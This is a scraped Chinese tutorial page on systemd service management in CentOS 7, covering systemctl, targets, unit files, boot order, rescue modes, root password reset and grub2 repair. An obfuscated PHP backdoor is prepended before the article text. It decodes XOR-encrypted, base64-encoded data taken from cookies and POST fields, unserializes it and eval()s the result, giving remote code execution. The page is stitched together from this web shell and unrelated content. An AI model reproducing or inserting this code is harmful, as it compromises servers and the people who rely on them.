$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} Centos7下的systemd管理 | Linux运维部落

Centos7下的systemd管理

systemd简介

Systemd是由红帽公司的一名叫做Lennart Poettering的员工开发,systemdLinux系统中最新的初始化系统(init,它主要的设计目的是克服Sys V 固有的缺点,提高系统的启动速度,systemdupstart是竞争对手,ubantu上使用的是upstart的启动方式,centos7上使用systemd替换了Sys VSystemd目录是要取代Unix时代依赖一直在使用的init系统,兼容SysVLSB的启动脚本,而且能够在进程启动中更有效地引导加载服务。

system:系统启动和服务器守护进程管理器,负责在系统启动或运行时,激活系统资源,服务器进程和其他进程,根据管理,字母d是守护进程(daemon)的缩写,systemd这个名字的含义就是它要守护整个系统。

 

Systemd新特性

系统引导时实现服务并行启动

按需启动守护进程

自动化的服务依赖关系管理

同时采用socket式与D-Bus总线式激活服务

系统状态快照和恢复

利用Linuxcgroups监视进程

维护挂载点和自动挂载点

各服务间基于依赖关系进行精密控制

 

systemd核心概念

unit表示不同类型的sytemd对象,通过配置文件进行标识和配置,文件中主要包含了系统服务,监听socket、保存的系统快照以及其他与init相关的信息

配置文件:

/usr/lib/systemd/system:每个服务最主要的启动脚本设置,类似于之前的/etc/initd.d

/run/system/system:系统执行过程中所产生的服务脚本,比上面的目录优先运行

/etc/system/system:管理员建立的执行脚本,类似于/etc/rc.d/rcN.d/Sxx类的功能,比上面目录优先运行,在三者之中,此目录优先级最高

 

Unit类型

systemctl -t help 查看unit类型

service unit:文件扩展名为.service,用于定义系统服务

target unit:文件扩展名为.target,用于模拟实现“运行级别”

device unit:.device,,用于定义内核识别的设备

mount unit .mount,定义文件系统挂载点

socket unit .socket,用于标识进程间通信用的socket文件,也可以在系统启动时,延迟启动服务,实现按需启动

snapshot unit.snapshot,关系系统快照

swap unit.swap,用于表示swap设备

automount unit.automount,文件系统的自动挂载点如:/misc目录

path unit.path,用于定义文件系统中的一个文件或目录使用,常用于当文件系统变化时,延迟激活服务,如spool目录

time  .timersystemd管理的计时器

1.jpg

   

 

使用systemctl控制单元时,通常需要使用单元文件的全名,包括扩展名,但是有些单元可以在systemctl中使用简写方式

如果无扩展名,systemctl默认把扩展名当做.service。例如netcfgnetcfg.service是等同的

挂载点会自动转化为相应的.mount单元,例如/home等价于home.mount

设备会自动转化为相应的.device单元,所以/dev/sd2等价于dev-sda2.device

 

关键特性

基于socket的激活机制:socket与服务进程分离

基于D-Bus的激活机制

基于device的激活机制

基于path的激活机制

系统快照:保存各unit的当前状态信息于持久存储设备中想后兼容sysv init脚本

 

不兼容

systemctl命令固定不变,不可扩展

非由systemd启动的服务,systemctl无语与之通信和控制,如:使用之前sys v风格管理的进程就无法收systemd控制

 

systemd基本工具

监视和控制systemd的主要命令是systemctl。该命令可用于查看系统状态和管理系统及服务。

 

管理服务

命令:systemctl  command name.service

启动:service name start –>systemctl start name.service

停止:service name stop –>systemctl stop name.service

重启:service name restart–>systemctl restart name.service

状态:service name status–>systemctl status name.service

 

条件式重启:已启动才重启,否则不做任何操作

systemctl try-restart name.service

 

重载或重启服务:先加载,然后再启动

systemctl reload-or-try-restart name.service

 

禁止自动和手动启动

systemctl mask name.service

执行此条命令实则创建了一个链接ln -s '/dev/null' '/etc/systemd/system/sshd.service'

 

取消禁止

systemctl unmask name.service

删除此前创建的链接

 

服务查看

查看某服务当前激活与否的状态

systemctl is-active name.service

如果启动会显示active,否则会显示unknown

 

查看所有已经激活的服务

systemctl list-units –t|–type service

2.jpg        

 

 

查看所有服务

systenctl list-units -t service -a |-all

    3.jpg

设定某服务开机启动

chkconfig name on–>systemctl enable name.service

 

设定某服务开机禁止启动

chkconfig name off –>systemctl disable name.service

 

查看所有服务的开机自启状态

chkconfig  –list–>systemctl list-unit-files  -t service

    4.jpg

用来列出该服务在那些运行级别下启用或禁用

chkconfig sshd –list –>ls /etc/system/system/*.wants/sshd.service

[root@server system]# ls /etc/systemd/system/*.wants/sshd.service

/etc/systemd/system/multi-user.target.wants/sshd.service

 

查看服务是否开机自启

systemctl is-enabled name.servcice

 

查看服务的依赖关系:

systemctl list-dependencies

    5.jpg

查看启动失败的服务

systemctl -failed  -t service

    6.jpg

 

查看服务单元的启用和禁用状态

systemctl list-unit-files –t=service

 

杀死进程

systemctl kill  进程名

    7.jpg

 

服务状态

systemctl list-units  -t service -a 显示状态

loadedunit配置文件已处理

activerunning):一次或多次持续处理的运行

activeexited):成功完成一次性的配置

activewaiting:运行中,等待一个事件

inactive:不运行

enabled:开机启动

disabled:开机不启动

static:开机不启动,但可以被另一个启用的服务激活

    8.jpg

 

运行级别

target units

unit配置文件:.target target结尾的文件

ls /usr/lib/system/system/*.target

systemctl list-unit-files -type target -all

0–>runlevel0.target, poweroff.target

1–>runlevel1.target, rescue.target

2–>runlevel2.target, muti-user.target

3–>runlevel3.target, mutil-user.target

4–>runlevel4.target, multi-user.target

5–>runlevel5.target, graphical.target

6–>runlevel6.target, reboot.target

    9.jpg

查看依赖性

    systemctl list-dependencies graphical.target

 

查看默认运行级别

    systemctl get-default  Sys V风格的系统上是查看/etc/inittab文件其中有一条id:5:initdefault:

 

级别切换

systemctl isolate muti-user.target

注意:只有当/lib/system/system/*.target文件中AllowIsolate=yes时才能奇幻(修改文件需执行systemctl daemon-reload生效)

设定默认运行级别

systemctl set-default muti-user.target   实则将multi-user.target链接至default.target

ls –l /etc/system/system/default.target 

    10.jpg

 

进入紧急救援模式

systemctl rescue

 

切换至emergency模式

    systemctl emergency

 

systemd风格的系统上还能使用sysv风格系统上的关机,重启等命令,指示将该命令链接到systemctl的一个软链接

关机:systemctl halt  systemctl poweroff

重启:systemctl reboot

挂起:systemctl suspend

休眠:systemctl hibernate

休眠并挂起:systemctl hybrid-sleep

 

CentOS7引导顺序

UEFiBIOS初始化,运行POST开机自检

选择启动设备(boot sequence

引导装载程序,centos7grub2

加载装载程序的配置文件:/etc/grub.d/

/etc/default/grub   /boot/grub2/grub.cfg

加载initramfs驱动模块

加载内核选项

内核初始化,centos7使用systemd代替init

执行initrd.target所有单元,包括挂载/etc/fstab

initramfs根文件系统切换到磁盘根目录

systemd执行默认target配置,配置文件

/etc/system/default.target  /etc/system/system

systemd指定sysinit.target初始系统及basic.target准备操作系统

systemd启动multi-user.target下的本机与服务器服务

system执行mutil-user.target下的getty.target及登入服务

systemd执行graphical需要的服务

 

 

 

unit文件格式

#开头的行后面的内容会被认为是注释

相关布尔值,1yesonture都是开启,0noofffalse都是关闭

时间单位默认是秒

 

文件由三部分组成

    [Unit]:定义与Unit类型无关的通用选项,用于提供unit的扫描信息,unit行为及依赖关系等

    [Service]:与特定类型相关的专用选项;此处为Service类型

    [Install]:定义由“systemctl enablesystemctl disable”命令在实现服务启用或禁用时用到的一些选项

 

unit段常用选项

    Description:描述信息

    After:定义unit的启动次序,表示当前unit应该晚育那些unit启动,其功能与before相反

    Requires:依赖到的其他units,强依赖,被一来的units无法激活时,当前unit即无法激活

    Wants:依赖到的其他units,弱依赖

    Conflicts:定义units间的冲突关系

 

Service段常用选项

    Type:定义硬性ExecStart及相关参数的功能的unit进程启动类型

    simple:默认值;这个daemon主要有ExecStart接的指令串来启动,启动后常驻于内存中

    forking:由ExecStart启动的程序透过spawns延伸出其他子程序来作为此daemon的主要服务。原生父程序在启动结束后就会终止

    onshot:用于执行一项任务,随后立即退出的服务,不会常驻于内存中

    notify:与simple相同,但约定服务会在就绪后想systemd发送一个信号,需要配合NotifyAccess来让Systemd接收消息

    idle:与simple类似,要执行这个daemon必须要所有的工作都顺利执行完毕后才会执行。这类的daemon通常是开机到最后才只能即可的服务

    EnvironmentFile:环境配置文件

    ExeStart:指明启动unit要运行命令或脚本的绝对路径

    ExeStartPreExecStart前运行

    ExeStartPostExecStart后运行

    ExecStop:指明停止unit要运行的命令或脚本

    Restart:当设定Restart=1时,则当次daemon服务意外终止后,会在此自动启动此服务

 

Install段常用选项

    Alias:别名,可使用systemctl command Alial.service

    RequiredBy:被那些units所依赖,强依赖

    WantedBy:被那些units所依赖,弱依赖

    Also:安装本服务的时候还要安装别的相关服务

注意:对于新创建的unit文件,或者修改了的unit文件,要通知systemd重载次配置文件,而后可以选择重启

    systemctl  daemon-reload

 

示例:

vim /etc/systemd/system/bak.service

    [Unit]

    Description=backup my etc

    Requires=atd.service

    [Service]

    Type=simple

    ExecStart=/bin/bash -c "echo /testdir/bak.sh|at now"

    [Install]

    WantedBy=multi-user.target

    systemctl daemon-reload

    systemctl start bak

 

设置内核参数

 在系统启动时,进入内核参数修改,修改只影响当次启动,在启动时在linux16行后添加systemd.unit=desired.target

    systemd.unit=emergency.target进入救援模式

system.unit=recure.target  进入紧急救援模式,功能比emergency

修改完成后使用ctrl+x启动进入相应的模式

 

 

启动排错

文件系统损坏

先尝试自动修复,如果失败则需要进入emergency 模式,提示用户修复

/etc/fstab 不存在对应的设备和UUID,等待一段时间,如果不可用,进入emergecy shell 注释哪行即可

/etc/fstab不存在对应挂载点

systemd尝试创建挂载点,否则提示进入emergecy shell

/etc/fstab不正确的挂载选项

提示进入emergecy shell

 

 

破解root口令

 

启动时任意键暂停启动

e键进入编辑模式

将光标移动linux16开始的行,添加内核参数rd.break

ctrl-x启动

mount -o remount,rw /sysroot

chroot /sysroot

passwd root

touch /.autorelabel

exit

exit

等待系统重新打标签后即可进入系统,这时候root的密码已经更改

 

修复grub2

 

GRUB“the Grand Unified Bootloader”

引导提示时可以使用命令行界面

可从文件系统引导

主要配置文件/boot/grub2/grub.cfg

修复配置文件

 

grub2-mkconfig > /boot/grub2/grub.cfg

修复grub

 

grub2-install /dev/sda BIOS环境

grub2-install UEFI环境

原创文章,作者:fszxxxks,如若转载,请注明出处:http://www.178linux.com/48343

(0)
上一篇 2016-09-23 09:06
下一篇 2016-09-23 09:10

相关推荐

  • 系统管理之磁盘管理(一)

    磁盘结构 一.概论 1.操作系统的组成部分: 硬件: 根据冯诺依曼体系,计算机的组成:    运算,控制器:cpu    存储器:主存(ram);       io设备:      &nbs…

    Linux干货 2016-08-30
  • FHS文件系统各目录功能

        FHS文件系统各目录功能 前言                  FHS (Files system Hiserarchy Standard)…

    Linux干货 2016-10-17
  • man,男人的使用方法

        Linux中有个很强大的男人,这个男人就是man。任何不懂得命令和或者配置文件我们都可以去man,所以请深爱这个男人;     我们输入 man ls,它会在最左上角显示“LS(1)”,在这里,“LS”表示手册名称,而“(1)”表示该手册位于第一节章,同样,我们输入“ma…

    Linux干货 2016-07-26
  • 网络基础命令与配置文件地址

    centos6查看网卡dmesg | grep -i ethethtool -i eth0卸载网卡驱动modprobe -r e1000rmmod e1000装载网卡驱动modprobe e1000网络配置,静态指定system-config-network-tui 字符界面式网络配置ip addr add IP地址 via 网关IP地址动态分配在/etc/…

    2017-09-09
  • find命令详解

    find命令详解 实时查找工具,通过遍历指定起始路径下文件系统层级结构完成文件查找; 一、工作特性: 查找速度略慢; 精确查找,只查找文件路径的基名而非整个路径; 实时查找; 可能只搜索用户具备读取和执行权限的目录 二、 用法: find [查找起始路径] [OPTIONS] [查找条件] [处理动作] 查找起始路径:指定具体搜索目标起始路径;默认为当前目录…

    Linux干货 2017-03-19
  • 马哥教育网络19期+第五周练习博客

    1、显示/boot/grub/grub.conf中以至少一个空白字符开头的行;   grep "^[[:space:]]\+.*" /boot/grub/grub.conf 2、显示/etc/rc.d/rc.sysinit文件中以#开头,后面跟至少一个空白字符,而后又有至少一个非空白字符的行; &n…

    Linux干货 2016-06-19

评论列表(1条)

  • 马哥教育
    马哥教育 2016-09-23 12:54

    总结的很不错,详细,赞一个。